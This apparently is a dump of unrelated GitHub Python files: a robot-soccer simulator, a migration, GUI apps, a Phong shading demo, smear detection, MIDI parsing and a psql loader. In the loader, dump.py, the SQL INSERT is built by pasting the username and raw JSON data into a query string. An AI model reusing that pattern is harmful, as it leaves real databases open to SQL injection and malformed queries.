yellow_robots_pos=yellow_robots_pos,\n time_step_ms=time_step_ms)\n \n self.field_params = self.get_field_params()\n\n def reset(self, frame: Frame):\n placement_pos = self._placement_dict_from_frame(frame)\n self.simulator.reset(**placement_pos)\n\n def stop(self):\n del(self.simulator)\n\n def send(self, commands):\n sim_commands = np.zeros(\n (self.n_robots_blue + self.n_robots_yellow, 2), dtype=np.float64)\n\n for cmd in commands:\n if cmd.yellow:\n rbt_id = self.n_robots_blue + cmd.id\n else:\n rbt_id = cmd.id\n # convert from linear speed to angular speed\n sim_commands[rbt_id][0] = cmd.v_wheel1\n sim_commands[rbt_id][1] = cmd.v_wheel2\n self.simulator.step(sim_commands)\n self.render()\n\n def receive(self) -> Frame:\n state = self.simulator.get_state()\n # Update frame with new state\n self.frame = Frame()\n self.frame.parse(state)\n\n return self._frame_to_observations()\n\n def get_field_params(self):\n return self.simulator.get_field_params()\n \n def _placement_dict_from_frame(self, frame: Frame):\n replacement_pos: Dict[str, np.ndarray] = {}\n\n ball_pos: List[float] = [frame.ball.x, frame.ball.y,\n frame.ball.v_x, frame.ball.v_y]\n replacement_pos['ball_pos'] = np.array(ball_pos)\n\n blue_pos: List[List[float]] = []\n for robot in frame.robots_blue.values():\n robot_pos: List[float] = [robot.x, robot.y, robot.theta]\n blue_pos.append(robot_pos)\n replacement_pos['blue_robots_pos'] = np.array(blue_pos)\n\n yellow_pos: List[List[float]] = []\n for robot in frame.robots_yellow.values():\n robot_pos: List[float] = [robot.x, robot.y, robot.theta]\n yellow_pos.append(robot_pos)\n replacement_pos['yellow_robots_pos'] = np.array(yellow_pos)\n\n return replacement_pos\n\n def _init_simulator(self, field_type, n_robots_blue, n_robots_yellow,\n ball_pos, blue_robots_pos, yellow_robots_pos,\n time_step_ms):\n\n return robosim.SimulatorVSS(\n field_type=field_type,\n n_robots_blue=n_robots_blue,\n n_robots_yellow=n_robots_yellow,\n ball_pos=ball_pos,\n blue_robots_pos=blue_robots_pos,\n yellow_robots_pos=yellow_robots_pos,\n time_step_ms=time_step_ms\n )\n\n def _frame_to_observations(self):\n\n observation = []\n\n observation.append(normX(self.frame.ball.x))\n observation.append(normX(self.frame.ball.y))\n observation.append(normVx(self.frame.ball.v_x))\n observation.append(normVx(self.frame.ball.v_y))\n\n for i in range(3):\n observation.append(normX(self.frame.robots_blue[i].x))\n observation.append(normX(self.frame.robots_blue[i].y))\n observation.append(\n np.sin(np.deg2rad(self.frame.robots_blue[i].theta))\n )\n observation.append(\n np.cos(np.deg2rad(self.frame.robots_blue[i].theta))\n )\n observation.append(normVx(self.frame.robots_blue[i].v_x))\n observation.append(normVx(self.frame.robots_blue[i].v_y))\n observation.append(normVt(self.frame.robots_blue[i].v_theta))\n\n for i in range(3):\n observation.append(normX(self.frame.robots_yellow[i].x))\n observation.append(normX(self.frame.robots_yellow[i].y))\n observation.append(normVx(self.frame.robots_yellow[i].v_x))\n observation.append(normVx(self.frame.robots_yellow[i].v_y))\n observation.append(normVt(self.frame.robots_yellow[i].v_theta))\n \n return np.array(observation, dtype=np.float32)\n \n def render(self, mode = None) -> None:\n '''\n Renders the game depending on \n ball's and players' positions.\n\n Parameters\n ----------\n None\n\n Returns\n -------\n None\n\n '''\n if self.view == None:\n self.view = RCGymRender(self.n_robots_blue,\n self.n_robots_yellow,\n self.field_params,\n simulator='vss')\n\n 
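        # (added note) send() already calls render() after stepping the simulator, so
        # callers rarely need to invoke render() directly; the RCGymRender view is
        # built lazily above on the first call, then each call just redraws the frame.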
self.view.render_frame(self.frame)\n    ","repo_name":"FelipeMartins96/play_fira","sub_path":"rsim/rsim.py","file_name":"rsim.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35788328174","text":"\"\"\"Initial migration.\n\nRevision ID: 1a37101df3a7\nRevises: \nCreate Date: 2021-12-06 17:11:12.213712\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1a37101df3a7'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('department_db', sa.Column('organisation3', sa.String(length=64), nullable=True))\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_column('department_db', 'organisation3')\n    # ### end Alembic commands ###\n","repo_name":"ArturIvanichyk/epam_winter2021_project","sub_path":"department_app/migrations/versions/1a37101df3a7_initial_migration.py","file_name":"1a37101df3a7_initial_migration.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"117540311","text":"def count_substring(string, sub_string):\n    sub_l = len(sub_string)\n    cnt = 0\n    for i in range(0,len(string)):\n        if string[i:sub_l+i] == sub_string:\n            #print(string[i:(sub_l+i)])\n            cnt += 1\n    return cnt\n\n\nif __name__ == '__main__':\n    a = 'Rameame'\n    b = 'ame'\n    cnt = count_substring(a,b)\n    print(cnt)\n","repo_name":"Rameshganesan/Mypython","sub_path":"cnt_of_substring.py","file_name":"cnt_of_substring.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70554679447","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom SimulatorWL import SimuladorLineaEspera\nfrom functools import partial\n\nclass SimuladorInterfaz(tk.Tk):\n    def __init__(self):\n        super().__init__()\n\n        # Interface state variables\n        self.num_servidores_var = tk.StringVar(value=\"5\")\n        self.imagenes_var = []\n\n        # Main window configuration\n        self.title(\"Simulador de Línea de Espera\")\n        self.geometry(\"800x600\")\n\n        # Label and entry field for the number of servers\n        tk.Label(self, text=\"Número de Servidores:\").pack(pady=10)\n        entry_num_servidores = tk.Entry(self, textvariable=self.num_servidores_var)\n        entry_num_servidores.pack(pady=10)\n\n        # Button to start the simulation\n        tk.Button(self, text=\"Iniciar Simulación\", command=self.iniciar_simulacion).pack(pady=10)\n\n        # Frame used to display the vehicle images\n        self.marco_imagenes = tk.Frame(self)\n        self.marco_imagenes.pack(pady=10)\n\n        # Simulator configuration\n        self.simulador = SimuladorLineaEspera(711.44, 2, 5)\n\n    def cargar_imagenes(self):\n        # Load the images from disk (the paths can be adjusted as needed)\n        paths_imagenes = [\"source/models/img/auto.jpg\", \"source/models/img/buses.jpg\", \"source/models/img/campero.jpg\"]\n        self.imagenes_var = [ImageTk.PhotoImage(Image.open(path).resize((20, 20))) for path in paths_imagenes]\n\n    def mostrar_imagen_vehiculo(self, tipo_vehiculo):\n        # Look up the index corresponding to this vehicle type\n        index = self.simulador.clients.get_index_by_vehicle_type(tipo_vehiculo)\n\n        # Update the corresponding image in the frame\n        if index 
is not None and index < len(self.imagenes_var):\n            imagen = self.imagenes_var[index]\n            tk.Label(self.marco_imagenes, image=imagen).pack(side=tk.LEFT)\n            self.update_idletasks() # refresh the UI so the image actually shows up\n            self.after(2000, self.limpiar_imagen_vehiculo) # wait 2 seconds and clear the image\n\n    def limpiar_imagen_vehiculo(self):\n        # Clear the frame after the image has been shown\n        for widget in self.marco_imagenes.winfo_children():\n            widget.destroy()\n\n    def iniciar_simulacion(self):\n        # Load the vehicle images\n        self.cargar_imagenes()\n\n        # Run the simulation\n        self.simulador.generateArrival(10)\n\n        # Show the image for each generated vehicle, waiting 2 seconds between clients\n        for cliente_info in self.simulador.clients.client_info:\n            _, tipo_vehiculo, _, _, _, _ = cliente_info\n            self.mostrar_imagen_vehiculo(tipo_vehiculo)\n\n\nif __name__ == \"__main__\":\n    app = SimuladorInterfaz()\n    app.mainloop()\n","repo_name":"TCfajardo/WaitingLines","sub_path":"source/models/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32618007243","text":"# Maintainer: Patrick Nikanti 2023\n\nimport sys\nimport os\nimport time\nimport json\nfrom psycopg2._psycopg import cursor as psqlcursor\nfrom connect import Connect, connect\n\ndef dump(db_name: str, table: str, filepath: str, credentials_filepath: str = \"secrets.json\"):\n    \"\"\"\n    Dump JSON file into a psql table.\n    \"\"\"\n    psql: Connect = connect(dbname=db_name)\n    database: psqlcursor = psql.database\n    database.execute(\n        f\"SELECT count(*) from {table}\"\n    )\n\n    with open(filepath, \"r\") as handle:\n        data: dict = json.load(handle)\n    id = database.fetchone()[0]\n    now = int(time.time())\n    username = os.getlogin()\n\n    # note: username and the JSON payload are string values, so they must be quoted\n    database.execute(\n        f\"INSERT INTO {table} (id, username, timestamp, data) VALUES({id}, '{username}', {now}, '{json.dumps(data)}')\"\n    )\n\nif __name__ == '__main__':\n    db_name = str(sys.argv[1])\n    table = str(sys.argv[2])\n    filepath = str(sys.argv[3])\n    \n    dump(\n        db_name=db_name,\n        table=table,\n        filepath=filepath\n    )\n","repo_name":"Pnikanti/TVT","sub_path":"lab/postgresql/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3425944325","text":"# https://www.acmicpc.net/problem/10845\n\nimport sys\n\nn = int(input())\nqueue = []\n\nfor _ in range(n):\n    cmd = sys.stdin.readline().split()\n\n    if len(cmd) > 1:\n        x = cmd[1]\n        queue.append(x)\n    else:\n        if cmd[0] == 'pop':\n            if len(queue) != 0:\n                print(queue[0])\n                queue.pop(0)\n            else:\n                print(-1)\n        elif cmd[0] == 'size':\n            print(len(queue))\n        elif cmd[0] == 'empty':\n            print(1) if len(queue) == 0 else print(0)\n        elif cmd[0] == 'front':\n            print(queue[0]) if len(queue) != 0 else print(-1)\n        elif cmd[0] == 'back':\n            print(queue[len(queue)-1]) if len(queue) != 0 else print(-1)","repo_name":"imlynmi/baekjoon","sub_path":"10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4028940017","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import ImageTk, Image\r\nimport datetime\r\nfrom datetime import time, date\r\n\r\nclass MainPointMonthTable(tk.Toplevel):\r\n    def __init__(self):\r\n        
super().__init__()\r\n self.init_main()\r\n \r\n def init_main(self):\r\n\r\n self.grab_set()\r\n self.focus_set()\r\n\r\n label1 = tk.Label(self, text = 'Выберите отдел:',bg = 'white', font = (\"Helvetica\", 9, \"bold\"))\r\n label1.place(x = 100 , y = 20)\r\n\r\n label2 = tk.Label(self, text = 'Отдел:',bg = 'white')\r\n label2.place(x = 100 , y = 60)\r\n\r\n self.entery_point = ttk.Combobox(self, values = ['Сити1', 'Сити2','Сити3','Ман1','Ман2','Радуга','ТДЖ','Сити4','Вавилон','Искра','Магнит','Рынок7','Валентина'])\r\n self.entery_point.insert(0, 'Сити1')\r\n self.entery_point.place(x = 160, y = 60)\r\n\r\n btn_show = tk.Button(self, text = 'Показать',bg = 'white')\r\n btn_show.bind('', lambda event: self.open_table(self.entery_point.get()))\r\n btn_show.place(x = 100, y = 100)\r\n\r\n def open_table(self, point):\r\n Table(point)\r\n \r\nclass Table(tk.Toplevel):\r\n def __init__(self, point):\r\n super().__init__()\r\n self.point = point\r\n self.init_main()\r\n \r\n def init_main(self):\r\n self.title(self.point + \" за месяцы лет\")\r\n self[\"bg\"] = \"white\"\r\n self.resizable(False, False)\r\n self.grab_set()\r\n self.focus_set()\r\n \r\n sells = pd.read_csv('d://Apps/Data/Sells.csv')\r\n general_expense = pd.read_csv('d://Apps/Data/GeneralExpense.csv')\r\n point_expense = pd.read_csv('d://Apps/Data/PointExpense.csv')\r\n text = sells.columns.values\r\n for i in range(len(sells[text[0]])):\r\n m = datetime.datetime.strptime(sells['Date'].loc[i],\"%Y-%m-%d\").date()\r\n sells.loc[i, 'Date'] = str(m.strftime(\"%B\"))\r\n sells.loc[i, 'ID'] = int(m.strftime(\"%Y\"))\r\n sells.rename(columns={ 'Date': 'Month', 'ID':'Year','Price':'Sum'}, inplace=True)\r\n sells = sells.groupby(by=['Year','Month','Point'], as_index = False).sum()\r\n\r\n general_expense = general_expense.groupby(by=['Year','Month'], as_index = False).sum()\r\n\r\n point_expense = point_expense.groupby(by=['Year','Month', 'Point'], as_index = False).sum()\r\n text1 = sells.columns.values\r\n text2 = point_expense.columns.values\r\n for i in range(len(sells[text1[0]])):\r\n for j in range(len(point_expense[text2[0]])):\r\n if sells.loc[i]['Year'] == point_expense.loc[j]['Year']:\r\n if sells.loc[i]['Month'] == point_expense.loc[j]['Month']:\r\n if sells.loc[i]['Point'] == point_expense.loc[j]['Point']:\r\n sells.loc[i,'Sum'] = sells.loc[i]['Sum'] - point_expense.loc[j]['Sum']\r\n new_df = sells\r\n\r\n general_expense = pd.read_csv('d://Apps/Data/GeneralExpense.csv')\r\n general_expense = general_expense.groupby(by=['Year','Month'], as_index = False).sum()\r\n numbers_points = pd.read_csv('d://Apps/Data/NumbersOfPoints.csv')\r\n text = general_expense.columns.values\r\n for i in range(len(general_expense[text[0]])):\r\n y = int(general_expense.loc[i]['Year'])\r\n m = str(general_expense.loc[i]['Month'])\r\n s = int(general_expense.loc[i]['Sum'])\r\n \r\n mask = numbers_points['Year'].values == y\r\n df = numbers_points[mask]\r\n n = int(df[m])\r\n general_expense.loc[i,'Sum'] = round(s / n, 2)\r\n minus_general = general_expense\r\n\r\n text1 = new_df.columns.values\r\n text2 = minus_general.columns.values\r\n for i in range(len(new_df[text1[0]])):\r\n for j in range(len(minus_general[text2[0]])):\r\n if new_df.loc[i]['Year'] == minus_general.loc[j]['Year']:\r\n if new_df.loc[i]['Month'] == minus_general.loc[j]['Month']:\r\n new_df.loc[i,'Sum'] = new_df.loc[i]['Sum'] - minus_general.loc[j]['Sum']\r\n\r\n\r\n sells = new_df\r\n #конец вычитания 
---------------------------------------------------------------------------------------------------\r\n \r\n mask = sells['Point'].values == self.point\r\n sells = sells[mask]\r\n df = pd.DataFrame(columns = ['Year','January','February','March','April','May','June','July','August','September','October','November','December','Total','Mean'])\r\n years = sells.groupby(by=['Year'], as_index = False).sum()[\"Year\"].to_list()\r\n for i in years:\r\n n = np.nan\r\n list1 = list1 = [i,n,n,n,n,n,n,n,n,n,n,n,n,n,n]\r\n df.loc[i] = list1\r\n text = sells.columns.values\r\n for i in range(len(sells[text[0]])):\r\n df.loc[int(sells.iloc[i]['Year']), str(sells.iloc[i]['Month'])] = round(sells.iloc[i]['Sum'],1)\r\n month_list = ['January','February','March','April','May','June','July','August','September','October','November','December'] \r\n df_sum = df[month_list]\r\n df['Total'] = df_sum.sum(axis=1)\r\n df['Mean'] = round(df_sum.mean(axis = 1,skipna = 1),2)\r\n\r\n columns = ['Year','January','February','March','April','May','June','July','August','September','October','November','December','Total', 'Mean']\r\n columns_rus = ['Год','Январь','Февраль','Март','Апрель','Май','Июнь','Июль','Август','Сентябрь','Октябрь','Ноябрь','Декабрь','Итого','Средние']\r\n self.tree = ttk.Treeview(self, columns = columns, height = 15, show = 'headings')\r\n self.vsb = tk.Scrollbar(self, orient=\"vertical\", command=self.tree.yview)\r\n self.tree.configure(yscrollcommand=self.vsb.set)\r\n self.vsb.pack(side=\"right\", fill=\"y\")\r\n \r\n for i in columns:\r\n self.tree.column(i, width = 100, anchor = tk.CENTER)\r\n \r\n for i in columns:\r\n m = columns_rus[columns.index(i)]\r\n self.tree.heading(i, text = m)\r\n \r\n data = df\r\n data = data.set_index(np.arange(len(data.index))) \r\n text = data.columns.values\r\n for i in range(len(data[text[0]])):\r\n self.tree.insert('', 'end', text=data[text[0]][i], values=list(map(lambda x: data[x][i], text[0:])))\r\n \r\n self.tree.pack(side=tk.TOP,fill=tk.X)","repo_name":"egormarusev/Something","sub_path":"AppForMother/Scripts/TablePointMonth.py","file_name":"TablePointMonth.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8575158375","text":"import sys, pygame\nfrom pygame import K_UP, K_DOWN, K_LEFT, K_RIGHT, K_PERIOD, K_COMMA\nfrom itertools import product\nfrom numpy import multiply, subtract, dot\nfrom math import sqrt\nfrom colorsys import hls_to_rgb, hsv_to_rgb\n\nX_SIZE = 400\nY_SIZE = 400\nscreen_size = (X_SIZE, Y_SIZE)\n\nCENTER_POINT = [X_SIZE/2, Y_SIZE/2, X_SIZE/2]\nRADIUS = 100\nLIGHT_SOURCE_POSITION = [150, 250, 0]\nOBSERVER_POSITION = [200, 200, 0]\n\nBALL_COLOR = 0.1\nCOLOR_SATURATION = 0.5\n\nX = 0\nY = 1 \nZ = 2\n\nSTEP = 50 \n\nIa = 1 # natężenie światła w otoczeniu obiektu\nIp = 1 # natężenie światła punktowego\nKa = 0.2 # współczynnik odbicia światła otoczenia\n\nKs = 0.1 # współczynnik odbicia światła kierunkowego \nKd = 0.4 # współczynnik odbicia światła rozproszonego \nn = 10 # współczynnik gładkości powierzchni\n\nmove_keys = { K_UP: lambda: move(STEP, Y), K_DOWN: lambda: move(-STEP, Y), K_RIGHT: lambda: move(STEP, X), \n K_LEFT: lambda: move(-STEP, X), K_PERIOD: lambda: move(STEP, Z), K_COMMA: lambda: move(-STEP, Z)}\n\n\ndef find_z_coordinate(x, y):\n b = -2 * CENTER_POINT[2]\n c = CENTER_POINT[2]**2 + (x - CENTER_POINT[0])**2 + (y - CENTER_POINT[1])**2 - RADIUS**2\n delta = b**2 - 4*c\n\n if delta == 0:\n return -b/2\n elif delta > 0:\n 
return min((sqrt(delta) - b)/2, (-sqrt(delta) - b)/2)\n\ndef calculate_light_source_distance(point):\n x_diff = LIGHT_SOURCE_POSITION[X] - point[X]\n y_diff = LIGHT_SOURCE_POSITION[Y] - point[Y]\n z_diff = LIGHT_SOURCE_POSITION[Z] - point[Z]\n\n return sqrt((x_diff)**2 + (y_diff)**2 + (z_diff)**2)\n\ndef f_att(r): # współczynnik tłumienia źródła z odległością\n C1 = 0.1\n C2 = 0.2\n C3 = 0.25\n\n return min(1/(C1 + C2*r +C3*r**2), 1)\n\ndef calculate_light_intensity(point):\n N = normal_vector(point)\n L = versor(vector(point, LIGHT_SOURCE_POSITION))\n V = versor(vector(point, OBSERVER_POSITION))\n R = versor(subtract(multiply(multiply(N, 2), multiply(N, L)), L))\n\n r = calculate_light_source_distance(point) / 100\n f = f_att(r)\n\n I = phong_model_function(Ia, Ip, Ka, Kd, Ks, f, N, L, R, V, n)\n\n return min(I, 1)\n\ndef normal_vector(point):\n return versor(vector(CENTER_POINT, point))\n\ndef phong_model_function(Ia, Ip, Ka, Kd, Ks, f, N, L, R, V, n):\n\n ambient_light = Ia * Ka\n diffuse_reflection = Ip * f * Kd * max(dot(N,L), 0)\n directional_reflection = Ip * f * Ks * max(dot(R,V),0)**n\n\n return ambient_light + diffuse_reflection + directional_reflection\n\ndef vector(start_point, end_point):\n return [end_point[0] - start_point[0], end_point[1] - start_point[1], end_point[2] - start_point[2]]\n\ndef versor(vector):\n n = sqrt(sum(e**2 for e in vector))\n return [e / n for e in vector]\n\ndef draw():\n x_range = range(X_SIZE)\n y_range = range(Y_SIZE)\n\n for x, y in product(x_range, y_range):\n z = find_z_coordinate(x, y)\n\n if z:\n ilumination = calculate_light_intensity([x, y, z])\n #r, g, b = hsv_to_rgb(BALL_COLOR, 0.8, ilumination)\n r, g, b = hls_to_rgb(BALL_COLOR, ilumination, COLOR_SATURATION)\n color = (255*r,255*g,255*b)\n\n screen.set_at((x, Y_SIZE - y), color)\n\n\ndef move(step, coord):\n LIGHT_SOURCE_POSITION[coord] += step\n print(f'Pozycja źródła światła: {LIGHT_SOURCE_POSITION}')\n\npygame.init()\nscreen = pygame.display.set_mode(screen_size)\n\nwhile True:\n screen.fill((0,0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n move_keys[event.key]()\n draw()\n\n pygame.display.flip()","repo_name":"KasiaWiktoria/model_phonga","sub_path":"phong_model.py","file_name":"phong_model.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24656223252","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n'''\r\nThis approach doesn't seem to leak memory, but it seem slower than the one\r\nin the plot_animated_2d module...\r\n'''\r\n\r\nN_FRAMES = 40\r\nx = np.arange(-200, 200) * .2\r\ny = np.arange(-200, 200).reshape(-1, 1) * .2\r\nbase = np.hypot(x, y)\r\n\r\nf = plt.figure()\r\nax = f.gca()\r\nplot = ax.pcolormesh(x, y, base, cmap='plasma')\r\n\r\nframes = [(base + i)[:-1, :-1].flatten() for i in range(N_FRAMES)]\r\ndef animate(i):\r\n plot.set_array(frames[i])\r\n\r\nanim = animation.FuncAnimation(f, animate, frames=N_FRAMES, interval=60)\r\n\r\nplt.draw()\r\nplt.show()\r\n","repo_name":"tarcisiofischer/examples-and-demos","sub_path":"matplotlib/plot_animated_2d_in_memory_data.py","file_name":"plot_animated_2d_in_memory_data.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36102821459","text":"import cv2\nimport os\nimport sys\nimport 
numpy as np\n\nroot_dir = 'sample_drive/'\ncheckpoint_dir = 'checkpoints/'\ncam_dir = 'cam_{}/'.format(sys.argv[1])\nimg_dir = root_dir + cam_dir\ndiff_dir = checkpoint_dir + 'diff/'\nprocessed_dir = checkpoint_dir + 'processed/'\n\nos.system('rm {}*'.format(diff_dir))\nos.system('rm {}*'.format(processed_dir))\n\ndef Get_Avg(img_dir):\n\timg_list = os.listdir(img_dir)\n\tfor n,i in enumerate(img_list):\n\t\tpro = ((n + 1) / len(img_list)) * 100.0\n\t\tsys.stdout.write('\\rAveraging images.. {}/{}'.format(n + 1, len(img_list)))\n\t\timg = cv2.imread(img_dir + i)\n\t\tif n == 0:\n\t\t\timg_avg = img\n\t\telse:\n\t\t\timg_avg = img_avg * n / (n+1) + img / (n + 1)\n\treturn img_avg\n\ndef Process(img):\n\tprint ('\\nProcessing image..')\n\t\n\t# img = cv2.GaussianBlur(img,(5,5),0)\n\t# img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)\n\t# ret,img = cv2.threshold(img,150,255,cv2.THRESH_BINARY)\n\timg = cv2.equalizeHist(img)\n\timg = cv2.GaussianBlur(img,(7,7),0)\n\t# img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,25,4)\n\t# ret,img = cv2.threshold(img,35,255,cv2.THRESH_BINARY)\n\t# img = cv2.Canny(img,10,0)\n\n\t\n\treturn img\n\ndef Segment(img,cdir,cam):\n\tprint ('Segmenting..')\t\n\tret,img = cv2.threshold(img,35,255,cv2.THRESH_BINARY)\n\tbi_path = cdir + cam[:-1] + '_bi.jpg'\n\tcv2.imwrite(bi_path,img)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(7, 7))\n\timg = cv2.dilate(img,kernel)\n\timg = 255 * np.ones_like(img) - img\n\tret, labels, stats, centroids = cv2.connectedComponentsWithStats(img, connectivity = 8)\n\tthreshhold_l = 0.001\n\tthreshhold_u = 0.1\n\tcc_nums = []\n\tmasks_paths = []\n\tfor i,s in enumerate(stats):\n\t\tif s[-1] > threshhold_l * img.size and s[-1] < threshhold_u * img.size:\n\t\t\tcc_nums.append(i)\n\tfor i,cc in enumerate(cc_nums):\n\t\tmsk = np.array(labels)\n\t\tmsk = np.where(msk == cc, 255,0)\n\t\tmsk_path = cdir + cam[:-1] + '_msk_'+ str(i) +'.jpg'\n\t\tprint (msk_path)\n\t\tcv2.imwrite(msk_path,msk)\n\t\tmasks_paths.append(msk_path)\n\treturn masks_paths\n\ndef Append_mask(masks,img,dir,cam):\n\tfor i,msk_path in enumerate(masks):\n\t\t# msk = cv2.cvtColor(msk, cv2.COLOR_BGR2GRAY)\n\t\t# ret,msk = cv2.threshold(msk,35,255,cv2.THRESH_BINARY)\n\t\t# canny = cv2.Canny(msk,10,0)\n\t\tmsk = cv2.imread(msk_path,0)\n\t\tret,msk = cv2.threshold(msk,127,255,cv2.THRESH_BINARY)\n\t\t# contours, hierarchy = cv2.findContours(msk,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\t\t# cv2.drawContours(msk, contours, -1, (0,255,0), 3)\n\t\tcanny = cv2.Canny(msk,10,0)\n\t\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\n\t\tcanny = cv2.dilate(canny,kernel)\n\n\t\t# cv2.imwrite(checkpoint_dir + cam[:-1] + '_canny_'+ str(i) +'.jpg',canny)\n\t\timg[canny == 255] = (0,0,255)\n\t\tcv2.imwrite(cdir + cam[:-1] + '_smear_'+ str(i) +'.jpg',img)\n\n\n\n\n\n\n'''\ndef Get_Avg_array(img_array_list):\n\tfor n,img in enumerate(img_array_list):\n\t\t# img = cv2.imread(img_dir + i,0)\n\t\tif n == 0:\n\t\t\timg_avg = img\n\t\telse:\n\t\t\timg_avg = img_avg * n / (n+1) + img / (n + 1)\n\t# img_avg = img_sum / len(img_list)\n\treturn img_avg \n'''\n\n\nimg_list = os.listdir(img_dir)\n'''\nfor i in range(1,len(img_list)):\n\t# Process the previous img\n\tpre_img_name = img_list[i-1]\n\tpre_img_path = img_dir + pre_img_name\n\tpre_img = cv2.imread(pre_img_path,0)\n\t# pre_img = Process(pre_img_path)\n\t# cv2.imwrite(processed_dir + pre_img_name,pre_img)\n\n\t# Process the current img\n\timg_name = 
img_list[i]\n\timg_path = img_dir + img_name\n\timg = cv2.imread(img_path,0)\n\t# img = Process(img_path)\n\t# cv2.imwrite(processed_dir + img_name,img)\n\t\n\n\t# calculate difference\n\timg_diff = img - pre_img\n\tdiff_name = img_name[:-4] + '-' + pre_img_name\n\tcv2.imwrite(diff_dir+diff_name,img_diff)\n\tprint (diff_name)\n'''\n'''\nprocessed_img_list = []\nfor i,img_name in enumerate(img_list):\n\tpro = ((i + 1) / len(img_list)) * 100.0\n\tsys.stdout.write(\"\\rProcessing images: %.2f%%\" % (pro))\n\t# print (img_name)\n\timg_path = img_dir + img_name\n\timg = Process(img_path)\n\tcv2.imwrite(processed_dir + img_name,img)\n\tprocessed_img_list.append(img)\n'''\n\n\n# diff_avg = Get_Avg(diff_dir)\n# cv2.imwrite('miniset/diff_avg.jpg',diff_avg)\n\n# Get the average of the input images (RGB)\n# img_avg = Get_Avg(img_dir)\n\n'''\ndiff_avg = Get_Avg(diff_dir)\ndiff_avg_path = 'miniset/diff_avg.jpg'\ncv2.imwrite(diff_avg_path,diff_avg)\n'''\nimg_avg_path = checkpoint_dir + cam_dir[:-1] + '_img_avg.jpg'\n# cv2.imwrite(img_avg_path, img_avg)\nimg_avg = cv2.imread(img_avg_path,0)\n\n# Process the averaged image\nimg_avg_processed = Process(img_avg)\nimg_avg_processed_path = checkpoint_dir + cam_dir[:-1] + '_img_avg_processed.jpg'\ncv2.imwrite(img_avg_processed_path,img_avg_processed)\n\n# Segment\nmasks = Segment(img_avg_processed, checkpoint_dir, cam_dir)\n\n# Show mask(s)\n# demo_img_path = checkpoint_dir + 'cam_3_demo.jpg'\n# demo_img = cv2.imread(demo_img_path)\n# Append_mask(masks,demo_img,checkpoint_dir, cam_dir)\n\n\n\n\n\n\n\n\n","repo_name":"subtractionxu/smear_detection","sub_path":"smear_detection.py","file_name":"smear_detection.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75022177367","text":"import os\nimport pandas as pd\nimport numpy as np\nimport random\nimport mido\nfrom pathlib import Path\n\n\nimport os\nimport mido\nimport pandas as pd\n\nMAX_TIME_STEPS = 500\n\n\ndef getMidiDF(fileLoc: str):\n # Store the data from the MIDI file in a list of dictionaries\n mid = mido.MidiFile(fileLoc, clip=True)\n midi_data = []\n for i, track in enumerate(mid.tracks):\n addTime = 0\n for msg in track:\n if msg.type == \"note_on\":\n addTime += msg.time\n midi_data.append(\n {\n \"track\": i,\n \"note\": msg.note,\n \"velocity\": msg.velocity,\n \"time\": msg.time,\n }\n )\n\n # Convert the list of dictionaries to a Pandas DataFrame\n df = pd.DataFrame(midi_data)\n\n # Check if the DataFrame has fewer than MAX_TIME_STEP rows\n if df.shape[0] < MAX_TIME_STEPS:\n # Calculate the number of rows to pad with zeros\n num_rows_to_pad = MAX_TIME_STEPS - df.shape[0]\n\n # Create a new DataFrame with the necessary number of rows and columns\n padded_df = pd.DataFrame(\n np.zeros((num_rows_to_pad, df.shape[1])), columns=df.columns\n )\n\n # Concatenate the original DataFrame and the padded DataFrame\n df = pd.concat([df, padded_df])\n\n df = df[:MAX_TIME_STEPS]\n\n df.to_csv(\n os.path.join(\"csvMidiData\", fileLoc.split(\"\\\\\")[-1].split(\".\")[0] + \".csv\"),\n index=False,\n )\n return df\n\n\ndef getAllMidiDFs(root_folder):\n # Create the output directory if it doesn't exist\n os.makedirs(\"midiData\", exist_ok=True)\n\n for root, dirs, files in os.walk(root_folder):\n for filename in files:\n if filename.endswith(\".mid\"):\n fileLoc = os.path.join(root, filename)\n getMidiDF(fileLoc)\n\n\n# 